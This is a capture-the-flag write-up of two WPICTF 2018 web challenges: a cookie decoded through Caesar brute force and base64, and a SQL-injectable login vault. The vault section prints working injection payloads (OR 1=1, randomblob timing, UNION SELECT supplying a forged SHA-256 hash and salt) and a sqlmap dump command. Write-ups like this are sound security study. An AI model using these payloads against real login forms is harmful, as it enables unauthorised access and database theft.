Information#
Version#
By | Version | Comment |
---|---|---|
noraj | 1.0 | Creation |
CTF#
- Name : WPICTF 2018
- Website : wpictf.xyz
- Type : Online
- Format : Jeopardy
- CTF Time : link
150 - Dance - Web#
by binam
TL;DR: intercepting proxy, base64 flag
cookie, Caesar bruteforce
The URL is using a HTTP 302 to redirect us to Rick Astley - Never Gonna Give You Up youtube video.
Making the request with Burp Suite Repeater,
1 | GET / HTTP/1.1 |
we obtain the following result:
1 | HTTP/1.1 302 FOUND |
The value of the flag
cookie is a base64 string but gives us nothing when we decode it.
The second cookie Julius C.
let us think this is about the Caesar
cipher.
By doing a Caesar bruteforce, we can get the following base64 string with a +17 shift: V1BJe2JJbkFtX2RvM3NuLHRfa24wd19oMXdfdDJfY3JlYVRlX2NoYUlJZW5nZXN9DQo=
.
Here was my ruby script to do some case sensitive Caesar bruteforce:
1 |
|
Then, we can decode the flag:
1 | $ printf %s 'V1BJe2JJbkFtX2RvM3NuLHRfa24wd19oMXdfdDJfY3JlYVRlX2NoYUlJZW5nZXN9DQo=' | base64 -d |
200 - Vault - Web#
by GODeva
In the source of index.html
we can read the following HTML comment:
1 | <!-- Welcome to the the Fuller Vault |
So I guess that we need to find a SQL injection to dump the database.
By inserting a single quote in the clientname
field of the form we get an error:
File /home/vault/vault/secretvault.py
, line 58, in login
1 | connection = sqlite3.connect(os.path.join(directoryFordata, 'clients.db')) |
So now we know there is a Python backend running Flask and we know the SQL query used.
This payload Goutham' OR '1'='1-- -
confirms the SQL injection and this one Goutham' AND 1=randomblob(1000000000)-- -
confirms it again.
So I read the SQLmap wiki to build a useful SQLmap command:
1 | $ sqlmap -u https://vault.wpictf.xyz/login --method=POST --data='clientname=Goutham&password=b' -p clientname --dbms SQLite --random-agent -T clients -C clientname,hash,salt --dump --risk 3 |
So we obtain the following data from the database:
- clientname:
Gaines
- hash:
ae6b2b347fd948b39a126e71decfc1cc411925a1ddc9f995949517d983fb027b
- id:
1
- salt:
leoczve
- clientname:
Goutham
- hash:
6bad0bd9907898e3c7d6b2139241ac7591a4556b2f9fbc41ed15a31e6d2df738
- id:
2
- salt:
nepdrqs
- clientname:
Binam
- hash:
49d790f22b2248638bf56f8a573c8e95eac2ed2f63a8f8eef97972d1b2d77bb7
- id:
3
- salt:
cseerlb
The hash used seems to be SHA-256:
1 | $ hashid 49d790f22b2248638bf56f8a573c8e95eac2ed2f63a8f8eef97972d1b2d77bb7 |
I tried to bruteforce them with my ruby script:
1 |
|
But I didn't get anything.
An admin gave me a hint: The goal is to trick the database when checking for a hash.
.
And they said on the Discord channel that bruteforce is not needed.
Note : I did this part after the end of the CTF.
Ok let's think this time before using force.
We know there is 3 columns in the query so let's try this: invalid' UNION SELECT 1,1,1-- -
.
We get an useful error again:
1 | res = pointer.fetchone() |
As we can't break Goutham's password we may use UNION
to provide another row with the hash we want, using a comment --
will allow us to bypass LIMIT 1
.
This way we will be able to provide arbitrary stuff in order to trick hashlib.sha256(password + salt)
.
Knowing the database and the hashing scheme we can compute a new hash and force the server to use it:
1 | $ printf %s%s 'rawsec' 'nepdrqs' | sha256sum |
- clientname:
invalid' UNION SELECT "2", "9c1e78c30e9721805b44701a05476086312741b6114334e3c312b87da7f95e4a", "nepdrqs"--
- password:
rawsec
Without knowing the database content but knowing the hash scheme is easy too, we can pick the id from the database and also overwrite the salt:
1 | $ printf %s%s 'rawsec' 'noraj' | sha256sum |
- clientname:
invalid' UNION SELECT id, "4541356add1076a04e4a340b7cb573c9533fc025b0b9af7be0203af216eaa13e", "noraj" FROM clients WHERE clientname = "Goutham"--
- password:
rawsec
But for those who didn't discovered the hash scheme with the second error message it is also possible to provide a void string so prefix or suffix salt will have the same behavior:
1 | $ printf %s%s 'rawsec' '' | sha256sum |
- clientname:
invalid' UNION SELECT id, "fc924c26cc88170d40d708e7eaf654b6dc6d1fb8b17bea1510eca639511833a1", "" FROM clients WHERE clientname = "Goutham"--
- password:
rawsec
Why Goutham? Because the comment on the page suggests it.
So we get the flag: Welcome back valid user! Your digital secret is: "WPI{y0ur_fl46_h45_l1k3ly_b31n6_c0mpr0m153d}"
.